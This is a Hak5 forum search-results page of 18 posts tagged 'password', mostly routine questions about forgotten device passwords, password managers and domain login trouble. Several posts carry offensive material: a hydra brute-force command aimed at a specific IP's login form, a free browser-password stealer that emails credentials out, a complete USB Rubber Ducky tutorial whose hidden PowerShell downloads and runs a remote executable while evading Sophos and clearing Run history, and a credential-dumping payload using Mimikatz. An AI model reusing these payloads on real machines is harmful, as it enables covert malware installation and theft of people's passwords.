Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'password'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 18 results

  1. AtomShards

    Windows 10 password crack

    Hi, i have been working in a computer store for a while and we get computers in with passwords that the user cant remember or they want us to remove the password. I just help out with the store and try my best to learn what i can but my knowledge is limited. We mainly use password cracking methods such as booting off a cd or usb with a cracking program such as offline PW, these work well but we havent been able to find any that are able to crack windows 10. If there is one out there that has been tested and does in fact work that would be awesome news :D But i would also like to learn how to crack these passwords myself, without using a program to do it for me, even just using a different shell such as kali and use the terminal in there or just the cmd on windows. All help is greatly appreciated, thank you.
  2. N1CR0N1X

    Thc hydra syntax error I need help please

    hydra 190.13.132.90 -s 8081 -V -L /home/nicolas/Escritorio/USER -P /home/nicolas/Escritorio/passwords.txt http-post-form "/user=^USER^&password=^PASS^=Ingresar&culture=es-CL&mobile=0&clasica=1:F=Usuario inexistente:H=Cookie: stwa2={"lang":"es-CL"}" that is the string that I’m using, I’m new to this type of things but it is for educational purposes for a project of my school. I really need help trying to figure up what does what but that is the best command that I could be able to type (with my poor knowledge) and gives me a syntax error every time, could someone correct me or tell me what I’m doing wrong please? It Would be very useful if someone writes the full command to learn how to do it
  3. Computers at an office use a network login to access the machines, so the passwords aren't stored locally and the SAM file has a hash for a blank password. The users accounts are heavily restricted in what they can do, but they do have some power shell access for IT. I have a Rubber Ducky and a Bash Bunny in my arsenal if they can be used. My main goal is to get password to the admin account(s). The office that I'm testing has a network connecting multiple buildings across the city. Any ideas, thanks.
  4. Ok so I work in a domain environment and one of my machines has somehow lost domain trust relationship. I attempted to reset the account in AD and no luck so then I think no big deal Ill log in as a local admin and then rejoin it right? Wrong. I log in as the local admin account that is standard on our network when we image a machine and somehow it is no longer part of the group "administrators." So I have a few backup accounts to try.. One being a admin account for our help desk and one service account for auditing and other use. Both of these accounts are also either not part of the local administrators group anymore or they have been disabled. I tried unplugging the network cable and logging in as well as power-shell scripts and other things from safe-mode but so far cannot get admin level access. I can login to the desktop but im stuck. How do you think these accounts got removed from the administrators group and how the machine randomly lost domain trust? Were we hacked?
  5. Vectre

    Best Password Manager?

    For around a year I've been using Dashlane's Premium tier however my subscription has recently run out and before I spend another $40 I want to be sure there are no better alternatives. I was looking at Lastpass as a replacement but with the upcoming acquisition by Citrix, I'm not to keen on what they might be planning for the service. I am keen on open source software and tend to use them whenever possible but in all honesty, I want to hear your experiences with the different software options available. For me I consider syncing between devices quite important however I understand this usually comes with a cost and it's normally only available on proprietary software so I am happy to sacrifice this for open and free alternatives. Cheers!
  6. OS . WINDOWS 10 Professional - TESTED ( 8 - 7 windows - maybe) NAME_SCRIPT . KaliStealthBOT Service . $FREE ************************************************************************************ I Can Grab a PWD Web Firefox - Chrome - IE and Send Via Email. ************************************************************************************* HOW TO SET: Register account SMTP free here https://app.smtp2go.com and *PUT-LOGIN-HERE* & *PUT-YOUR-PWD* then *INSERT-YOUR@EMAIL-HERE* where you want receive the goods :) __________________________________________________________ 1.$url = 'https://1fichier.com/?xxxxxxxxx- Pass Stealer Software 2.$url = 'https://1fichier.com/?xxxxxxxxx - sendEmail Client *** You can change this with every similar software __________________________________________________________ See u.. https://www.ducktoolkit.com/viewscript/59967fc4ac04af7d6d57dc54/ I Appreciated all comment or rebuild. Thanks
  7. Decoy

    HakShop Concern

    Hello, I don't know if I am blind or what - but I can't seem to find where to change my Hakshop Account password ANYWHERE. Is this functionality not available? It looks like the only thing I can add/change is my address. Thanks, D
  8. Hey, I ordered the beautiful USB rubber ducky and its working flawlessly. On windows its easy as copy-pasterino seeing how ducktoolkit is crazy good. I have one wish tho, and seeing how thats possible on windows, i dont see why it should be possible on mac. I want to be able to find a passord on a mac computer, on safari, chrome or firefox, does not matter. The password I am looking for is to a website. Also a quick question, I installed dropbox and my computer automatically logs in to the dropbox program, which is great. Just wondering where that password is saved..? Gonna be trying that on this device, and if it does not work ill try my look on the wifi pineapple nano, just got it today. :D Thank you guys!
  9. AussieShrimpy

    What Password Code is this?

    I'm testing some exploits (with msfconsole) on my computer, and one is to get all chrome passwords (run post/windows/local/gather/enum_chrome). But when its all dumped in a text file, it says to convert it to SQLite format 3. Once I do, the "password_value" are all these numbers - e.g. 1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,253,205,96,38,96,22,46,70,162,33,196,194,213,148,137,101,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,244,122,3,160,21,227,67,94,253,236,241,93,222,192,46,48,180,66,247,219,114,166,25,75,204,236,29,166,251,144,53,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,194,226,197,184,178,20,230,184,150,194,26,41,136,36,137,86,52,34,230,179,59,19,116,192,118,48,96,104,65,145,201,181,16,0,0,0,12,58,88,83,253,13,230,96,59,133,102,249,171,216,197,234,64,0,0,0,75,177,153,45,195,147,172,205,57,249,76,127,190,29,60,77,184,171,107,119,99,141,142,141,202,51,197,252,5,116,160,121,185,222,212,145,1,245,138,184,145,3,81,74,60,13,5,157,77,213 How could I decode this??? Thanks (btw, the password code above, isn't all there, just incase someone tries to decode it)
  10. How does it work / what is it? I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky! This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. Tutorial: First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime. Script for website: The code on my website looks something like this... Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" $arr = (Get-Item -Path $path).Property $url = "www.linkToEndPayload" $output = "$env:temp/test.zip"; $out = "$env:temp/Remake.txt"; Remove-Item -Path $output Invoke-WebRequest -Uri $url -OutFile $output Unzip $output "$env:temp/" Rename-Item -Path $out -NewName "Remake.exe" Start-Process -FilePath "$env:temp/Remake.exe" foreach($item in $arr) { if($item -ne "MRUList") { Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue } } This code downloads the .EXE payload (Which is stored in a .ZIP file.) We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates. Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this... Script for ducky: DELAY 500 GUI r DELAY 100 STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a ENTER That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection. PS: I'm not very good at PowerShell Scripting
  11. hello Is it possible to get "admin" password of a dvr like "evil twin" used in wifi password ? just a idea. Any suggestions, thanks
  12. DumpCreds 2.0 Author: QDBA Version: Version 2.0.2 Target: Windows Description Dumps the usernames & plaintext passwords from Browsers (Crome, IE, FireFox) Wifi SAM Hashes Mimimk@tz Dump [new] Computerinformition ( Hardware, Softwarelist, Hotfixes, ProuctKey, Users...) without Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) Internet connection (becaus Firewall ContentFilter Blocks the download sites) Configuration None needed. Requirements Impacket must be installed. Install it from tools_installer payload https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer STATUS LED ----------------------- Status -------------------------------------------------------------- White Give drivers some time for installation Red Blink Fast Impacket not found Red Blink Slow Target did not acquire IP address Amber Blink Fast Initialization Amber HID Stage Purple Blink Fast Wait for IP coming up Purple Blink Slow Wait for Handshake (SMBServer Coming up) Purple / Amber Powershell scripts running RED Error in Powershell Scripts Green Finished Download https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0 ToDo paralellize Creds gathering with PS while Bashbunny is waiting for Target finished the script it can do some other nice work. i.e. nmap the target. (Not very usefull at the moment, because I'm Admin on Target Host) remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) Not Possible at the moment put some version information into the sourcecode and the output file rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain Credits to...... https://github.com/sekirkity/BrowserGather Get-ChromeCreds.ps1 https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1
  13. WatskeBart

    [SOLVED] SSH into RNDIS_ETHERNET

    When running the following payload: LED G ATTACKMODE RNDIS_ETHERNET And try to SSH into the bunny (172.16.64.10) with Putty. As root I always get 'Access Denied' I've change the default password using attackmode serial but that password is not working for SSH. I even set it back to the default hak5bunny password, but still no joy. What am I missing here?
  14. M@s0n

    Root password reset

    Is there a way to reset the root password without logging in.
  15. Greetings! I really hope this isn't a silly question. I was talking with my friend about the NANO and how it can deauth clients on a network, then convince those clients to connect to the NANO as a rogue access point. I realize that it is not difficult to capture and rebroadcast SSIDs, but they are always open access points. If I wanted to capture the WPA or WPA2 handshake, is there a way to either log it and send it to another machine to be cracked, or just grab whatever information the device sends to the NANO, and use that to create a copy of the original SSID complete with its password? Basically, what I am trying to figure out is if the NANO can capture data that will assist in knowing the password to a particular network. I am still learning how handshakes, frames, and beacons work, and although I have a basic understanding, I am not sure if this is feasible or not. I know WPA and WPA2 passwords are hard to crack, but would it help if the device connecting to the rogue AP tried to give that rogue AP its part of that handshake? Would it be easier (or even feasible) to just go into that client system and take whatever the saved password is and store it for future use? Any clarity or resources on this subject would be appreciated. Cheers, Dez
  16. PigFermer

    Forgot password Lanturtle

    I have forgotten my password to my Lanturtle (you dont have to say anything). What can i do to reset my password or the device?
  17. ArcticWolf_11

    How Do I Sniff For Passwords

    Hi, how would I sniff https passwords using the nano? I had a mark 4 a while back and I didnt have much success. Also, how would I get the client to connect to the pineapple if they are already connected to a network. Thanks!
  18. mule

    LAN Turtle

    I just got my LAN turtle today and plugged it into my USB port. SSH (using putty) to it on 172.16.84.1, got the SSH key trust,typed root for the password and the default password from the Wiki page (http://lanturtle.com/wiki/#!index.md#Connecting_for_the_first_time) but given the error access denied. Any help would be appreciated. Something tells me that the Wiki page password might be out of date. Thanks, Mule
×